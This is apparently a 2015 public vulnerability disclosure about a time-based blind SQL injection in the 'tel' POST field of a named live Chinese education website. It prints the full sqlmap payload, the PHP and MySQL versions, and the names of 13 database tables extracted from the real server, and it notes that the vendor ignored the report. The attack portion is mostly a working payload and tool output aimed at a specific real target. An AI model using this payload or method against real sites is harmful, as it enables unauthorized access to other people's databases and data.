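2015-11-07: Details reported to the vendor; awaiting vendor handling
2015-11-12: The vendor has actively ignored the vulnerability; details disclosed to the public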
Just a POST injection, 13 tables
target: http://sc.huatu.com:80/zt/shaifen/jieguo.php (POST)
name=123&tel=123&beizhu=123&huifang=123&diqu=%E9%9B%85%E5%AE%89%E5%B8%82&chafen=%E6%99%92%E4%B8%80%E6%99%92
sqlmap identified the following injection point(s) with a total of 329 HTTP(s) requests:
---
Parameter: tel (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: name=123&tel=123' AND (SELECT * FROM (SELECT(SLEEP(5)))LNba) AND 'YlyG'='YlyG&beizhu=123&huifang=123&diqu=%E9%9B%85%E5%AE%89%E5%B8%82&chafen=%E6%99%92%E4%B8%80%E6%99%92
---
web application technology: PHP 5.3.27
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tel (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: name=123&tel=123' AND (SELECT * FROM (SELECT(SLEEP(5)))LNba) AND 'YlyG'='YlyG&beizhu=123&huifang=123&diqu=%E9%9B%85%E5%AE%89%E5%B8%82&chafen=%E6%99%92%E4%B8%80%E6%99%92
---
web application technology: PHP 5.3.27
back-end DBMS: MySQL 5.0.12
Database: test
[13 tables]
+---------------+
| 2015gxsf      |
| 2015sbds      |
| 2015scsf      |
| 2015wsj_game1 |
| 2015wsj_game2 |
| 2015ztxz      |
| get_ip        |
| gz_info       |
| jilin_duanxin |
| jilin_kq30    |
| jilin_mssk    |
| jilin_mszt    |
| jilin_skmijq  |
+---------------+
Time-based; did not go any further
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-12 09:54
Vulnerability Rank: 4 (WooYun rating)
None yet